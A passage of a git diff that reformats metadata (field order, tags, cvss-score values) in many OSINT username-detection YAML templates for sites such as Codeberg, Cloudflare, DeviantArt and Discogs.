b/http/osint/climatejusticerocks-mastodon-instance.yaml index 4070990b99..77a5394e35 100644 --- a/http/osint/climatejusticerocks-mastodon-instance.yaml +++ b/http/osint/climatejusticerocks-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: climatejusticerocks-mastodon-instance info: name: Climatejustice.rocks (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Climatejustice.rocks (Mastodon Instance) user name information check was conducted. severity: info + description: Climatejustice.rocks (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,climatejusticerocks-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,climatejusticerocks-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/cloudflare.yaml b/http/osint/cloudflare.yaml index 8ac9c0be4b..d27b7e8108 100644 --- a/http/osint/cloudflare.yaml +++ b/http/osint/cloudflare.yaml @@ -3,17 +3,18 @@ id: cloudflare info: name: Cloudflare User Name Information - Detect author: dwisiswant0 - description: Cloudflare user name information check was conducted. severity: info + description: Cloudflare user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,cloudflare metadata: max-request: 1 + tags: osint,osint-tech,cloudflare self-contained: true + http: - method: GET path: diff --git a/http/osint/clubhouse.yaml b/http/osint/clubhouse.yaml index bb72290043..18e2569de3 100644 --- a/http/osint/clubhouse.yaml +++ b/http/osint/clubhouse.yaml @@ -3,17 +3,18 @@ id: clubhouse info: name: Clubhouse User Name Information - Detect author: dwisiswant0 - description: Clubhouse user name information check was conducted. severity: info + description: Clubhouse user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,clubhouse metadata: max-request: 1 + tags: osint,osint-social,clubhouse self-contained: true + http: - method: GET path: diff --git a/http/osint/clusterdafrica.yaml b/http/osint/clusterdafrica.yaml index 9a1b449691..35673b271a 100644 --- a/http/osint/clusterdafrica.yaml +++ b/http/osint/clusterdafrica.yaml @@ -3,17 +3,18 @@ id: clusterdafrica info: name: Clusterdafrica User Name Information - Detect author: dwisiswant0 - description: Clusterdafrica user name information check was conducted. severity: info + description: Clusterdafrica user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,clusterdafrica metadata: max-request: 1 + tags: osint,osint-social,clusterdafrica self-contained: true + http: - method: GET path: diff --git a/http/osint/cnet.yaml b/http/osint/cnet.yaml index e3c37bf66e..03f217ecdd 100644 --- a/http/osint/cnet.yaml +++ b/http/osint/cnet.yaml @@ -3,17 +3,18 @@ id: cnet info: name: Cnet User Name Information - Detect author: dwisiswant0 - description: Cnet user name information check was conducted. severity: info + description: Cnet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,cnet metadata: max-request: 1 + tags: osint,osint-news,cnet self-contained: true + http: - method: GET path: diff --git a/http/osint/codeberg.yaml b/http/osint/codeberg.yaml index 18fffbe90b..1dfba3638d 100644 --- a/http/osint/codeberg.yaml +++ b/http/osint/codeberg.yaml @@ -3,17 +3,18 @@ id: codeberg info: name: Codeberg User Name Information - Detect author: dwisiswant0 - description: Codeberg user name information check was conducted. severity: info + description: Codeberg user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,codeberg metadata: max-request: 1 + tags: osint,osint-coding,codeberg self-contained: true + http: - method: GET path: diff --git a/http/osint/codecademy.yaml b/http/osint/codecademy.yaml index 7f623058b0..56d1f69b6b 100644 --- a/http/osint/codecademy.yaml +++ b/http/osint/codecademy.yaml @@ -3,17 +3,18 @@ id: codecademy info: name: Codecademy User Name Information - Detect author: dwisiswant0 - description: Codecademy user name information check was conducted. severity: info + description: Codecademy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,codecademy metadata: max-request: 1 + tags: osint,osint-coding,codecademy self-contained: true + http: - method: GET path: diff --git a/http/osint/codeforces.yaml b/http/osint/codeforces.yaml index baee82da71..7e73468b80 100644 --- a/http/osint/codeforces.yaml +++ b/http/osint/codeforces.yaml @@ -3,17 +3,18 @@ id: codeforces info: name: Codeforces User Name Information - Detect author: dwisiswant0 - description: Codeforces user name information check was conducted. severity: info + description: Codeforces user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,codeforces metadata: max-request: 1 + tags: osint,osint-coding,codeforces self-contained: true + http: - method: GET path: diff --git a/http/osint/codementor.yaml b/http/osint/codementor.yaml index f2dc515385..79ebb1512e 100644 --- a/http/osint/codementor.yaml +++ b/http/osint/codementor.yaml @@ -3,17 +3,18 @@ id: codementor info: name: Codementor User Name Information - Detect author: dwisiswant0 - description: Codementor user name information check was conducted. severity: info + description: Codementor user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,codementor metadata: max-request: 1 + tags: osint,osint-coding,codementor self-contained: true + http: - method: GET path: diff --git a/http/osint/coderwall.yaml b/http/osint/coderwall.yaml index d968c660bd..f377c47b55 100644 --- a/http/osint/coderwall.yaml +++ b/http/osint/coderwall.yaml @@ -3,17 +3,18 @@ id: coderwall info: name: Coderwall User Name Information - Detect author: dwisiswant0 - description: Coderwall user name information check was conducted. severity: info + description: Coderwall user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,coderwall metadata: max-request: 1 + tags: osint,osint-coding,coderwall self-contained: true + http: - method: GET path: diff --git a/http/osint/codewars.yaml b/http/osint/codewars.yaml index d26b386601..039042bdf8 100644 --- a/http/osint/codewars.yaml +++ b/http/osint/codewars.yaml @@ -3,17 +3,18 @@ id: codewars info: name: Codewars User Name Information - Detect author: dwisiswant0 - description: Codewars user name information check was conducted. severity: info + description: Codewars user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,codewars metadata: max-request: 1 + tags: osint,osint-coding,codewars self-contained: true + http: - method: GET path: diff --git a/http/osint/cohost.yaml b/http/osint/cohost.yaml index 229fa428b2..3ff365dbcf 100644 --- a/http/osint/cohost.yaml +++ b/http/osint/cohost.yaml @@ -3,17 +3,18 @@ id: cohost info: name: Cohost User Name Information - Detect author: dwisiswant0 - description: Cohost user name information check was conducted. severity: info + description: Cohost user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,cohost metadata: max-request: 1 + tags: osint,osint-social,cohost self-contained: true + http: - method: GET path: diff --git a/http/osint/colourlovers.yaml b/http/osint/colourlovers.yaml index dd316ec06c..e731f91011 100644 --- a/http/osint/colourlovers.yaml +++ b/http/osint/colourlovers.yaml @@ -3,17 +3,18 @@ id: colourlovers info: name: COLOURlovers User Name Information - Detect author: dwisiswant0 - description: COLOURlovers user name information check was conducted. severity: info + description: COLOURlovers user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,colourlovers metadata: max-request: 1 + tags: osint,osint-hobby,colourlovers self-contained: true + http: - method: GET path: diff --git a/http/osint/contactossex.yaml b/http/osint/contactossex.yaml index ab472b23ed..cf0cd7045d 100644 --- a/http/osint/contactossex.yaml +++ b/http/osint/contactossex.yaml @@ -3,17 +3,18 @@ id: contactossex info: name: Contactos.sex User Name Information - Detect author: dwisiswant0 - description: Contactos.sex user name information check was conducted. severity: info + description: Contactos.sex user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,contactossex metadata: max-request: 1 + tags: osint,osint-porn,contactossex self-contained: true + http: - method: GET path: diff --git a/http/osint/coroflot.yaml b/http/osint/coroflot.yaml index c8322d9675..ad94778807 100644 --- a/http/osint/coroflot.yaml +++ b/http/osint/coroflot.yaml @@ -3,17 +3,18 @@ id: coroflot info: name: Coroflot User Name Information - Detect author: dwisiswant0 - description: Coroflot user name information check was conducted. severity: info + description: Coroflot user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,coroflot metadata: max-request: 1 + tags: osint,osint-art,coroflot self-contained: true + http: - method: GET path: diff --git a/http/osint/couchsurfing.yaml b/http/osint/couchsurfing.yaml index 0825a1ca67..d53d4e7e79 100644 --- a/http/osint/couchsurfing.yaml +++ b/http/osint/couchsurfing.yaml @@ -4,17 +4,17 @@ info: name: Couchsurfing User Name Information - Detect author: philippedelteil severity: info - description: Couchsurfing user name information check was conducted. - This OSINT template looks for information about a user name in Couchsurfing.CouchSurfing is a hospitality exchange service by which users can request free short-term homestays or interact with other people who are interested in travel. + description: Couchsurfing user name information check was conducted. This OSINT template looks for information about a user name in Couchsurfing.CouchSurfing is a hospitality exchange service by which users can request free short-term homestays or interact with other people who are interested in travel. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,couchsurfing metadata: max-request: 1 + tags: osint,osint-social,couchsurfing self-contained: true + http: - method: GET path: diff --git a/http/osint/cowboys4angels.yaml b/http/osint/cowboys4angels.yaml index 6e99c137b4..cdbf0af635 100644 --- a/http/osint/cowboys4angels.yaml +++ b/http/osint/cowboys4angels.yaml @@ -3,17 +3,18 @@ id: cowboys4angels info: name: Cowboys4angels User Name Information - Detect author: dwisiswant0 - description: Cowboys4angels user name information check was conducted. severity: info + description: Cowboys4angels user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,cowboys4angels metadata: max-request: 1 + tags: osint,osint-porn,cowboys4angels self-contained: true + http: - method: GET path: diff --git a/http/osint/cracked-io.yaml b/http/osint/cracked-io.yaml index 8d7670b25d..b8f9bce9d2 100644 --- a/http/osint/cracked-io.yaml +++ b/http/osint/cracked-io.yaml @@ -3,17 +3,18 @@ id: cracked-io info: name: Cracked io User Name Information - Detect author: dwisiswant0 - description: Cracked io user name information check was conducted. severity: info + description: Cracked io user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,cracked-io metadata: max-request: 1 + tags: osint,osint-social,cracked-io self-contained: true + http: - method: GET path: diff --git a/http/osint/cracked.yaml b/http/osint/cracked.yaml index 7d6a793479..232e87449c 100644 --- a/http/osint/cracked.yaml +++ b/http/osint/cracked.yaml @@ -3,17 +3,18 @@ id: cracked info: name: Cracked User Name Information - Detect author: dwisiswant0 - description: Cracked user name information check was conducted. severity: info + description: Cracked user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,cracked metadata: max-request: 1 + tags: osint,osint-social,cracked self-contained: true + http: - method: GET path: diff --git a/http/osint/crevado.yaml b/http/osint/crevado.yaml index aac4986f0c..3aec246b17 100644 --- a/http/osint/crevado.yaml +++ b/http/osint/crevado.yaml @@ -3,17 +3,18 @@ id: crevado info: name: Crevado User Name Information - Detect author: dwisiswant0 - description: Crevado user name information check was conducted. severity: info + description: Crevado user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,crevado metadata: max-request: 1 + tags: osint,osint-images,crevado self-contained: true + http: - method: GET path: diff --git a/http/osint/crowdin.yaml b/http/osint/crowdin.yaml index 8cda130323..0905d7a9a9 100644 --- a/http/osint/crowdin.yaml +++ b/http/osint/crowdin.yaml @@ -3,17 +3,18 @@ id: crowdin info: name: Crowdin User Name Information - Detect author: dwisiswant0 - description: Crowdin user name information check was conducted. severity: info + description: Crowdin user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,crowdin metadata: max-request: 1 + tags: osint,osint-hobby,crowdin self-contained: true + http: - method: GET path: diff --git a/http/osint/ctflearn.yaml b/http/osint/ctflearn.yaml index 06a2fa727b..5f825fc399 100644 --- a/http/osint/ctflearn.yaml +++ b/http/osint/ctflearn.yaml @@ -7,13 +7,14 @@ info: description: CTFLearn user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,ctflearn metadata: max-request: 1 + tags: osint,osint-social,ctflearn self-contained: true + http: - method: GET path: diff --git a/http/osint/cults3d.yaml b/http/osint/cults3d.yaml index be95c5121f..cb3324b5fe 100644 --- a/http/osint/cults3d.yaml +++ b/http/osint/cults3d.yaml @@ -3,17 +3,18 @@ id: cults3d info: name: Cults3D User Name Information - Detect author: dwisiswant0 - description: Cults3D user name information check was conducted. severity: info + description: Cults3D user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,cults3d metadata: max-request: 1 + tags: osint,osint-hobby,cults3d self-contained: true + http: - method: GET path: diff --git a/http/osint/curiouscat.yaml b/http/osint/curiouscat.yaml index 893bc5abee..7d504da3d7 100644 --- a/http/osint/curiouscat.yaml +++ b/http/osint/curiouscat.yaml @@ -3,17 +3,18 @@ id: curiouscat info: name: Curiouscat User Name Information - Detect author: dwisiswant0 - description: Curiouscat user name information check was conducted. severity: info + description: Curiouscat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,curiouscat metadata: max-request: 1 + tags: osint,osint-social,curiouscat self-contained: true + http: - method: GET path: diff --git a/http/osint/cytoid.yaml b/http/osint/cytoid.yaml index 64de7b4d0f..53e7c7e920 100644 --- a/http/osint/cytoid.yaml +++ b/http/osint/cytoid.yaml @@ -3,17 +3,18 @@ id: cytoid info: name: Cytoid User Name Information - Detect author: dwisiswant0 - description: Cytoid user name information check was conducted. severity: info + description: Cytoid user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,cytoid metadata: max-request: 1 + tags: osint,osint-gaming,cytoid self-contained: true + http: - method: GET path: diff --git a/http/osint/dailymotion.yaml b/http/osint/dailymotion.yaml index 8001dafe5d..e64c58d64e 100644 --- a/http/osint/dailymotion.yaml +++ b/http/osint/dailymotion.yaml @@ -3,17 +3,18 @@ id: dailymotion info: name: Dailymotion User Name Information - Detect author: dwisiswant0 - description: Dailymotion user name information check was conducted. severity: info + description: Dailymotion user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,dailymotion metadata: max-request: 1 + tags: osint,osint-video,dailymotion self-contained: true + http: - method: GET path: diff --git a/http/osint/darudar.yaml b/http/osint/darudar.yaml index 9c32eebd02..1d45bddded 100644 --- a/http/osint/darudar.yaml +++ b/http/osint/darudar.yaml @@ -3,17 +3,18 @@ id: darudar info: name: Darudar User Name Information - Detect author: dwisiswant0 - description: Darudar user name information check was conducted. severity: info + description: Darudar user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,darudar metadata: max-request: 1 + tags: osint,osint-misc,darudar self-contained: true + http: - method: GET path: diff --git a/http/osint/dateinasia.yaml b/http/osint/dateinasia.yaml index 3407f18f64..a4aa877577 100644 --- a/http/osint/dateinasia.yaml +++ b/http/osint/dateinasia.yaml @@ -3,17 +3,18 @@ id: dateinasia info: name: Dateinasia User Name Information - Detect author: dwisiswant0 - description: Dateinasia user name information check was conducted. severity: info + description: Dateinasia user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,dateinasia metadata: max-request: 1 + tags: osint,osint-dating,dateinasia self-contained: true + http: - method: GET path: diff --git a/http/osint/datezone.yaml b/http/osint/datezone.yaml index e4db938e19..6cd14ebe34 100644 --- a/http/osint/datezone.yaml +++ b/http/osint/datezone.yaml @@ -3,17 +3,18 @@ id: datezone info: name: Datezone User Name Information - Detect author: dwisiswant0 - description: Datezone user name information check was conducted. severity: info + description: Datezone user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,datezone metadata: max-request: 1 + tags: osint,osint-porn,datezone self-contained: true + http: - method: GET path: diff --git a/http/osint/datingru.yaml b/http/osint/datingru.yaml index bf0cbb53b2..3cbe807614 100644 --- a/http/osint/datingru.yaml +++ b/http/osint/datingru.yaml @@ -3,17 +3,18 @@ id: datingru info: name: Dating.ru User Name Information - Detect author: dwisiswant0 - description: Dating.ru user name information check was conducted. severity: info + description: Dating.ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,datingru metadata: max-request: 1 + tags: osint,osint-dating,datingru self-contained: true + http: - method: GET path: diff --git a/http/osint/demotywatory.yaml b/http/osint/demotywatory.yaml index e9f12fcc74..b2c6671b0b 100644 --- a/http/osint/demotywatory.yaml +++ b/http/osint/demotywatory.yaml @@ -3,17 +3,18 @@ id: demotywatory info: name: Demotywatory User Name Information - Detect author: dwisiswant0 - description: Demotywatory user name information check was conducted. severity: info + description: Demotywatory user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,demotywatory metadata: max-request: 1 + tags: osint,osint-images,demotywatory self-contained: true + http: - method: GET path: diff --git a/http/osint/depop.yaml b/http/osint/depop.yaml index 5caa6729b4..c4953c0051 100644 --- a/http/osint/depop.yaml +++ b/http/osint/depop.yaml @@ -3,17 +3,18 @@ id: depop info: name: Depop User Name Information - Detect author: dwisiswant0 - description: Depop user name information check was conducted. severity: info + description: Depop user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,depop metadata: max-request: 1 + tags: osint,osint-shopping,depop self-contained: true + http: - method: GET path: diff --git a/http/osint/designspriation.yaml b/http/osint/designspriation.yaml index c5c5c40c0b..1f20672f5b 100644 --- a/http/osint/designspriation.yaml +++ b/http/osint/designspriation.yaml @@ -3,17 +3,18 @@ id: designspriation info: name: Designspriation User Name Information - Detect author: dwisiswant0 - description: Designspriation user name information check was conducted. severity: info + description: Designspriation user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,designspriation metadata: max-request: 1 + tags: osint,osint-art,designspriation self-contained: true + http: - method: GET path: diff --git a/http/osint/destructoid.yaml b/http/osint/destructoid.yaml index 7599259509..3bb64d964d 100644 --- a/http/osint/destructoid.yaml +++ b/http/osint/destructoid.yaml @@ -3,17 +3,18 @@ id: destructoid info: name: Destructoid User Name Information - Detect author: dwisiswant0 - description: Destructoid user name information check was conducted. severity: info + description: Destructoid user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,destructoid metadata: max-request: 1 + tags: osint,osint-social,destructoid self-contained: true + http: - method: GET path: diff --git a/http/osint/deviantart.yaml b/http/osint/deviantart.yaml index 125f8ff6f5..b553b5b90f 100644 --- a/http/osint/deviantart.yaml +++ b/http/osint/deviantart.yaml @@ -3,17 +3,18 @@ id: deviantart info: name: DeviantArt User Name Information - Detect author: dwisiswant0 - description: DeviantArt user name information check was conducted. severity: info + description: DeviantArt user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,deviantart metadata: max-request: 1 + tags: osint,osint-images,deviantart self-contained: true + http: - method: GET path: diff --git a/http/osint/devrant.yaml b/http/osint/devrant.yaml index f736757dc2..ab9e5d1f9f 100644 --- a/http/osint/devrant.yaml +++ b/http/osint/devrant.yaml @@ -3,17 +3,18 @@ id: devrant info: name: DevRant User Name Information - Detect author: dwisiswant0 - description: DevRant user name information check was conducted. severity: info + description: DevRant user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,devrant metadata: max-request: 1 + tags: osint,osint-coding,devrant self-contained: true + http: - method: GET path: diff --git a/http/osint/devto.yaml b/http/osint/devto.yaml index b6d588cba4..4f99526ed5 100644 --- a/http/osint/devto.yaml +++ b/http/osint/devto.yaml @@ -3,17 +3,18 @@ id: devto info: name: Dev.to User Name Information - Detect author: dwisiswant0 - description: Dev.to user name information check was conducted. severity: info + description: Dev.to user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,devto metadata: max-request: 1 + tags: osint,osint-coding,devto self-contained: true + http: - method: GET path: diff --git a/http/osint/dfgames.yaml b/http/osint/dfgames.yaml index 1a0d973f07..1de2116ad0 100644 --- a/http/osint/dfgames.yaml +++ b/http/osint/dfgames.yaml @@ -3,17 +3,18 @@ id: dfgames info: name: Dfgames User Name Information - Detect author: dwisiswant0 - description: Dfgames user name information check was conducted. severity: info + description: Dfgames user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,dfgames metadata: max-request: 1 + tags: osint,osint-gaming,dfgames self-contained: true + http: - method: GET path: diff --git a/http/osint/diablo.yaml b/http/osint/diablo.yaml index d605bdd275..f080337611 100644 --- a/http/osint/diablo.yaml +++ b/http/osint/diablo.yaml @@ -3,17 +3,18 @@ id: diablo info: name: Diablo User Name Information - Detect author: dwisiswant0 - description: Diablo user name information check was conducted. severity: info + description: Diablo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,diablo metadata: max-request: 1 + tags: osint,osint-gaming,diablo self-contained: true + http: - method: GET path: diff --git a/http/osint/dibiz.yaml b/http/osint/dibiz.yaml index 99827edb94..089babb132 100644 --- a/http/osint/dibiz.yaml +++ b/http/osint/dibiz.yaml @@ -3,17 +3,18 @@ id: dibiz info: name: DIBIZ User Name Information - Detect author: dwisiswant0 - description: DIBIZ user name information check was conducted. severity: info + description: DIBIZ user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,dibiz metadata: max-request: 1 + tags: osint,osint-business,dibiz self-contained: true + http: - method: GET path: diff --git a/http/osint/digitalspy.yaml b/http/osint/digitalspy.yaml index 4f1d5dac53..abb2cfed8d 100644 --- a/http/osint/digitalspy.yaml +++ b/http/osint/digitalspy.yaml @@ -3,17 +3,18 @@ id: digitalspy info: name: Digitalspy User Name Information - Detect author: dwisiswant0 - description: Digitalspy user name information check was conducted. severity: info + description: Digitalspy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,digitalspy metadata: max-request: 1 + tags: osint,osint-social,digitalspy self-contained: true + http: - method: GET path: diff --git a/http/osint/diigo.yaml b/http/osint/diigo.yaml index 90f3b9e295..d67d66032f 100644 --- a/http/osint/diigo.yaml +++ b/http/osint/diigo.yaml @@ -3,17 +3,18 @@ id: diigo info: name: Diigo User Name Information - Detect author: dwisiswant0 - description: Diigo user name information check was conducted. severity: info + description: Diigo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,diigo metadata: max-request: 1 + tags: osint,osint-images,diigo self-contained: true + http: - method: GET path: diff --git a/http/osint/disabledrocks-mastodon-instance.yaml b/http/osint/disabledrocks-mastodon-instance.yaml index 73b4d2b75d..b558420390 100644 --- a/http/osint/disabledrocks-mastodon-instance.yaml +++ b/http/osint/disabledrocks-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: disabledrocks-mastodon-instance info: name: Disabled.rocks (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Disabled.rocks (Mastodon Instance) user name information check was conducted. severity: info + description: Disabled.rocks (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,disabledrocks-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,disabledrocks-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/discogs.yaml b/http/osint/discogs.yaml index 9d60ca2932..14c72323d6 100644 --- a/http/osint/discogs.yaml +++ b/http/osint/discogs.yaml @@ -3,17 +3,18 @@ id: discogs info: name: Discogs User Name Information - Detect author: dwisiswant0 - description: Discogs user name information check was conducted. severity: info + description: Discogs user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,discogs metadata: max-request: 1 + tags: osint,osint-music,discogs self-contained: true + http: - method: GET path: diff --git a/http/osint/discourse.yaml b/http/osint/discourse.yaml index ce3ec3af97..cf47c5b487 100644 --- a/http/osint/discourse.yaml +++ b/http/osint/discourse.yaml @@ -3,17 +3,18 @@ id: discourse info: name: Discourse User Name Information - Detect author: dwisiswant0 - description: Discourse user name information check was conducted. severity: info + description: Discourse user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,discourse metadata: max-request: 1 + tags: osint,osint-misc,discourse self-contained: true + http: - method: GET path: diff --git a/http/osint/discusselasticco.yaml 